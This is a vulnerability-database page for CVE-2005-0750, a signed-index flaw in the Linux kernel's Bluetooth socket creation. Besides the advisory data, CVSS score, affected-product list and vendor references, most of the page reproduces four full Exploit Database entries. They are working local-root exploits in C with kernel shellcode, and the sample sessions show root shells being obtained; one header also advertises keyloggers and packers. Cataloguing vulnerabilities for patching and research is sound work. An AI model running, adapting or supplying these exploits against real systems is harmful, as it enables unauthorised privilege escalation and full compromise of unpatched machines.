CVE-2005-0750 : Detail

CVE-2005-0750

0.21%V4
Local
2005-04-03
03h00 +00:00
2017-10-09
22h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The bluez_sock_create function in the Bluetooth stack for Linux kernel 2.4.6 through 2.4.30-rc1 and 2.6 through 2.6.11.5 allows local users to gain privileges via (1) socket or (2) socketpair call with a negative protocol value.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 25287

Publication date : 2005-03-27 22h00 +00:00
Author : ilja van sprundel
EDB Verified : Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> main() { int ctl; /* Open HCI socket */ if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0) { perror("Can't open HCI socket."); exit(1); } }
Exploit Database EDB-ID : 25289

Publication date : 2005-10-18 22h00 +00:00
Author : backdoored.net
EDB Verified : Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT * * 19 October 2005 http://backdoored.net Visit us for Undetected keyloggers and packers.Thanx h4x0r bluetooth $ id uid=1000(addicted) gid=100(users) groups=100(users) h4x0r bluetooth $ h4x0r bluetooth $ ./backdoored-bluetooth KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) Checking the Effective user id after overflow : UID = 0 h4x0r bluetooth # id uid=0(root) gid=0(root) groups=100(users) h4x0r bluetooth # h4x0r bluetooth # dmesg PREEMPT SMP Modules linked in: CPU: 0 EIP: 0060:[<c0405ead>] Not tainted VLI EFLAGS: 00010286 (2.6.9) EIP is at bt_sock_create+0x3d/0x130 eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0 esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c ds: 007b es: 007b ss: 0068 Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34 00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34 c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 Call Trace: [<c039a3bb>] __sock_create+0xfb/0x2a0 [<c039a58d>] sock_create+0x2d/0x40 [<c039a60b>] sys_socket+0x2b/0x60 [<c039b4e8>] sys_socketcall+0x68/0x260 [<c0117a9c>] finish_task_switch+0x3c/0x90 [<c0117b07>] schedule_tail+0x17/0x50 [<c0115410>] do_page_fault+0x0/0x5e9 [<c01031af>] syscall_call+0x7/0xb Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <sys/types.h> #include <unistd.h> #include <limits.h> #include <signal.h> #include <sys/wait.h> #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 #define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff #define KERNEL_SPACE_BUFFER 0x100000 char asmcode[] = /*Global shellcode*/ "xb8x00xf0xffxffx31xc9x21xe0x8bx10x89x8a" "x80x01x00x00x31xc9x89x8ax7cx01x00x00x8b" "x00x31xc9x31xd2x89x88x90x01x00x00x89x90" "x8cx01x00x00xb8xffxffxffxffxc3"; struct net_proto_family { int family; int (*create) (int *sock, int protocol); short authentication; short encryption; short encrypt_net; int *owner; }; int check_zombie_child(int status,pid_t pid) { waitpid(pid,&status,0); if(WIFEXITED(status)) { if(WEXITSTATUS(status) != 0xFF) exit(-1); } else if (WIFSIGNALED(status)) { printf("KERNEL Oops. Exit Code = %d.(%s) ",WTERMSIG(status),strsignal(WTERMSIG(status))); return(WTERMSIG(status)); } } int brute_socket_create (int negative_proto_number) { socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ int i; i = geteuid(); printf("Checking the Effective user id after overflow : UID = %d ",i); if(i) exit(EXIT_FAILURE); printf("0wnage D0ne bro. "); execl("/bin/sh","sh",NULL); exit(EXIT_SUCCESS); } int main(void) { pid_t pid; int counter; int status; int *kernel_return; char kernel_buffer[KERNEL_SPACE_BUFFER]; unsigned int brute_start; unsigned int where_kernel; struct net_proto_family *bluetooth; bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); bzero(bluetooth,sizeof(struct net_proto_family)); bluetooth->family = AF_BLUETOOTH; bluetooth->authentication = 0x0; /* No Authentication */ bluetooth->encryption = 0x0; /* No Encryption */ bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ bluetooth->owner = 0x0; /* No fucking owner */ bluetooth->create = (int *) asmcode; kernel_return = (int *) kernel_buffer; for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) *kernel_return = (int)bluetooth; brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; printf("Bluetooth stack local root exploit "); printf("http://backdoored/net"); while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) { where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; where_kernel = -where_kernel; pid = fork(); if(pid == 0 ) brute_socket_create(where_kernel); check_zombie_child(status,pid); brute_start += KERNEL_SPACE_BUFFER; fflush(stdout); } return 0; }
Exploit Database EDB-ID : 926

Publication date : 2005-10-25 22h00 +00:00
Author : qobaiashi
EDB Verified : Yes

/* Due to many responses i've improved the exploit to cover more systems! ONG_BAK v0.9 [october 24th 05] """""""""""""""""""""""""""""""""""" o universal "shellcode" added o try to use all possible memory regions o bugfixes qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222 -|-bluez local root exploit v.0.9 -by qobaiashi- | |- i've found kernel 2.6.11.4-20a-default |- trampoline is at 0x804869c |- trying... |- [ecx: bf8d0000 ] |- suitable value found!using 0xbf8d0000 |- the time has come to push the button... sh-3.00# exit ONG_BAK v0.3 [april 8th 05] """"""""""""""""""""""""""""""""" ong_bak now checks the value of ecx and launches the exploit in case a suitable value has been found! ONG_BAK v0.1 [april 4th 05] """"""""""""""""""""""""""""""""" local root exploit for the bluetooth bug usage: the bug is quite stable so you can't realy fuck things up if you stick to the following: play around with the negative argument until ecx points to our data segment: qobaiashi@voyager:~> ./ong_bak -1002341 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0b8f0f0f ] qobaiashi@voyager:~> ./ong_bak -10023411 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0809da40 ] |- suitable value found!using 0x0809da40 |- the time has come to push the button.. qobaiashi@voyager:~> id uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> that's it. unfortunately it's not yet very practicable.. qobaiashi@u-n-f.com */ #include <sys/klog.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <sys/utsname.h> #include <sys/mman.h> void usage(char *path); //===================[ kernel 2.6* privilege elevator ]=============================== //===================[ qobaiashi@u-n-f.com ]=============================== //globals int uid, gid; extern load_highlevel; __asm__ ( "load_highlevel: \n" "xor %eax, %eax \n" "mov $0xffffe000, %eax\n" "and %esp,%eax \n" "pushl %eax \n" "call set_root \n" "pop %eax \n" //ret to userspace-2.6.* version " cli \n" " pushl $0x7b \n" //DS user selector " pop %ds \n" " pushl %ds \n" //SS " pushl $0xc0000000 \n" //ESP " pushl $0x246 \n" //EFLAGS " pushl $0x73 \n" //CS user selector " pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!! "iret \n" ); void set_root(unsigned int *ts) { ts = (int*)*ts; int cntr; //hope you guys are int aligned for(cntr = 0; cntr <= 512; cntr++, ts++) if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid) ts[0] = ts[1] = ts[4] = ts[5] = 0; } void shellcode() { system("/bin/sh"); exit(0); } //==================================================================================== //==================================================================================== main(int argc, char *argv[]) { char buf[2048]; int sock, *mod = (int*)buf; int *linker = 0; unsigned int arg; int tmp; char *check; struct utsname vers; gid = getgid(); uid = getuid(); printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n"); if (uname(&vers) < 0) printf(" |- couldn't determine kernel version\n"); else printf(" |- i've found kernel %s\n", vers.release); printf(" |- trampoline is at %p\n", &load_highlevel); if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 2) arg = strtoul(argv[1], 0, 0); if (fork() != 0)//parent watch the Oops { //previous Oops printing usleep(1000); if ((tmp = klogctl(0x3, buf, 1700)) > -1) { check = strstr(buf, "ecx: "); printf(" |- [%0.14s]\n", check); check+=5; *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; mod = (unsigned int*)strtoul(check, 0, 0); //page align FIXME: might be booggy int *ecx = mod; mod = (int)mod &~ 0x00000fff; linker = mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0); if(linker == mod)//we could mmap the area { printf(" |- suitable value found!using %p\n", mod); printf(" |- the time has come to push the button... \n"); for (sock = 0;sock <= 1;sock++) //use ecx *(ecx++) = (int)&load_highlevel; //link to shellcode } else { printf(" |- could not mmap %p\n", mod); if( brk((void*)mod+0x200 ) == -1) { printf(" |- could not brk to %p\n", mod); printf(" `-------------------------------\n"); exit(-1); } //here we did it printf(" |- suitable value found!using %p\n", mod); printf(" |- the time has come to push the button... \n"); for (sock = 0;sock <= 1;sock++) //use ecx *(ecx++) = (int)&load_highlevel; //link to shellcode } if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) exit(1); } return 0; } if (fork() == 0)//child does the pre-exploit { printf(" |- trying...\n"); if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } exit(0); } /*****************\ |** usage **| \*****************/ void usage(char *path) { printf(" |----------------------------\n"); printf(" | usage: %s <negative value> \n", path); printf(" | tested:\n"); printf(" | SuSE 9.1: -10023411 \n"); printf(" | -41122122 \n"); printf(" | Kernel 2.6.11: -10023 \n"); printf(" | SuSE 9.3: -100222\n"); printf(" | -102901\n"); printf(" `-----------------------\n"); exit(0); } // 1st post: milw0rm.com [2005-04-09] // milw0rm.com [2005-10-26]
Exploit Database EDB-ID : 25288

Publication date : 2005-04-07 22h00 +00:00
Author : qobaiashi
EDB Verified : Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ /* ONG_BAK v0.3 [april 8th 05] """"""""""""""""""""""""""""""""" ong_bak now checks the value of ecx and launches the exploit in case a suitable value has been found! ONG_BAK v0.1 [april 4th 05] """"""""""""""""""""""""""""""""" local root exploit for the bluetooth bug usage: the bug is quite stable so you can't realy fuck things up if you stick to the following: play around with the negative argument until ecx points to our data segment: qobaiashi@voyager:~> id uid=1000(qobaiashi) gid=100(users) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> ./ong_bak -1002341 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0b8f0f0f ] qobaiashi@voyager:~> ./ong_bak -10023411 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0809da40 ] |- suitable value found!using 0x0809da40 |- the time has come to push the button.. qobaiashi@voyager:~> id uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> the parent process becomes root. that's it. unfortunately it's not yet very practicable.. qobaiashi@u-n-f.com */ #include <sys/klog.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <sys/utsname.h> #define BRKVAL 0x0cec9000 //should be enough but fix it if you get an error void usage(char *path); //due to changing task_structs we need different offsets char k_give_root[] = //----[ give root in ring0/tested on linux2.6.5/x86/ by -q ]-----\\ "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x31\xc0" // xor %eax,%eax "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax "\x21\xe0" // and %esp,%eax "\x8b\x00" // mov (%eax),%eax "\x8b\x80\xa4\x00\x00\x00" // mov 0xa4(%eax),%eax "\xc7\x80\xf0\x01\x00\x00\x00" // movl $0x0,0x1f0(%eax) "\x00\x00\x00" "\xc7\x80\xf4\x01\x00\x00\x00" // movl $0x0,0x1f4(%eax) "\x00\x00\x00" "\xc7\x80\x00\x02\x00\x00\x00" // movl $0x0,0x200(%eax) "\x00\x00\x00" "\xc7\x80\x04\x02\x00\x00\x00" // movl $0x0,0x204(%eax) "\x00\x00\x00" "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 ; char k_give_root2[] = //----[ give root in ring0/tested linux2.6.11/x86/ by -q ]-----\\ "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x31\xc0" // xor %eax,%eax "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax "\x21\xe0" // and %esp,%eax "\x8b\x00" // mov (%eax),%eax "\x8b\x80\x9c\x00\x00\x00" // mov 0x9c(%eax),%eax "\xc7\x80\x68\x01\x00\x00\x00" // movl $0x0,0x168(%eax) "\x00\x00\x00" "\xc7\x80\x78\x01\x00\x00\x00" // movl $0x0,0x178(%eax) "\x00\x00\x00" "\xc7\x80\x6c\x01\x00\x00\x00" // movl $0x0,0x16c(%eax) "\x00\x00\x00" "\xc7\x80\x7c\x01\x00\x00\x00" // movl $0x0,0x17c(%eax) "\x00\x00\x00" "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 ; main(int argc, char *argv[]) { char buf[2048]; int sock, *mod = (int*)buf; unsigned int arg; int tmp; char *check, *ong_code = 0; struct utsname vers; printf("-|-local bluez exploit v.0.3 -by qobaiashi-\n |\n"); if (uname(&vers) < 0) printf(" |- couldn't determine kernel version\n"); else { printf(" |- i've found kernel %s\n", vers.release); if(strstr(vers.release, "2.6.11") > 0) ong_code = k_give_root2; if(strstr(vers.release, "2.6.4") > 0) ong_code = k_give_root; } if (ong_code == 0) { printf(" |- no supported version found..trying 2.6.4 code\n"); ong_code = k_give_root; } if( brk((void*)BRKVAL) == -1 ) { printf(" |- brk failed..exiting\n"); exit(1); } if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 2) arg = strtoul(argv[1], 0, 0); if (argc == 3) { arg = strtoul(argv[1], 0, 0); mod = (unsigned int*)strtoul(argv[2], 0, 0); } if (fork() != 0)//parent watch the Oops { //previous Oops printing usleep(100); if ((tmp = klogctl(0x3, buf, 1700)) > -1) { check = strstr(buf, "ecx: "); printf(" |- [%0.14s]\n", check); if (*(check+5) == 0x30 && *(check+6) == 0x38) { check+=5; printf(" |- suitable value found!using 0x%0.9s\n", check); printf(" |- the time has come to push the button... check your id!\n"); *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; mod = (unsigned int*)strtoul(check, 0, 0); for (sock = 0;sock <= 200;sock++) *(mod++) = (int)ong_code;//link to shellcode if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } } return 0; } if (fork() == 0)//child does the exploit { for (sock = 0;sock <= 200;sock++) *(mod++) = (int)ong_code;//link to shellcode printf(" |- trying...\n"); if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } exit(0); } /*****************\ |** usage **| \*****************/ void usage(char *path) { printf(" |----------------------------\n"); printf(" | usage: %s <negative value> \n", path); printf(" | tested:\n"); printf(" | SuSE 9.1: -10023411 \n"); printf(" | -10029 \n"); printf(" | Kernel 2.6.11: -10023 \n"); exit(0); }

Products Mentioned

Configuraton 0

Conectiva>>Linux >> Version 10.0

Configuraton 0

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.19

Linux>>Linux_kernel >> Version 2.4.20

Linux>>Linux_kernel >> Version 2.4.21

Linux>>Linux_kernel >> Version 2.4.22

Linux>>Linux_kernel >> Version 2.4.23

Linux>>Linux_kernel >> Version 2.4.24

Linux>>Linux_kernel >> Version 2.4.25

Linux>>Linux_kernel >> Version 2.4.26

Linux>>Linux_kernel >> Version 2.4.27

Linux>>Linux_kernel >> Version 2.4.28

Linux>>Linux_kernel >> Version 2.4.29

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.3

Linux>>Linux_kernel >> Version 2.6.4

Linux>>Linux_kernel >> Version 2.6.5

Linux>>Linux_kernel >> Version 2.6.6

Linux>>Linux_kernel >> Version 2.6.7

Linux>>Linux_kernel >> Version 2.6.8

Linux>>Linux_kernel >> Version 2.6.9

    Linux>>Linux_kernel >> Version 2.6.10

    Linux>>Linux_kernel >> Version 2.6.11

    Redhat>>Enterprise_linux >> Version 4.0

      Redhat>>Enterprise_linux >> Version 4.0

        Redhat>>Enterprise_linux >> Version 4.0

          Redhat>>Enterprise_linux_desktop >> Version 4.0

          Redhat>>Fedora_core >> Version core_1.0

            Redhat>>Fedora_core >> Version core_2.0

              Redhat>>Fedora_core >> Version core_3.0

                Redhat>>Linux >> Version 7.3

                Redhat>>Linux >> Version 7.3

                  Redhat>>Linux >> Version 7.3

                    Redhat>>Linux >> Version 9.0

                      Suse>>Suse_linux >> Version 1.0

                        Suse>>Suse_linux >> Version 9.3

                        Ubuntu>>Ubuntu_linux >> Version 4.1

                          Ubuntu>>Ubuntu_linux >> Version 4.1

                            References

                            http://www.redhat.com/support/errata/RHSA-2005-366.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://www.redhat.com/support/errata/RHSA-2005-283.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://marc.info/?l=bugtraq&m=111204562102633&w=2
                            Tags : mailing-list, x_refsource_BUGTRAQ
                            http://www.securityfocus.com/bid/12911
                            Tags : vdb-entry, x_refsource_BID
                            https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=152532
                            Tags : vendor-advisory, x_refsource_FEDORA
                            http://www.redhat.com/support/errata/RHSA-2005-293.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://www.redhat.com/support/errata/RHSA-2005-284.html
                            Tags : vendor-advisory, x_refsource_REDHAT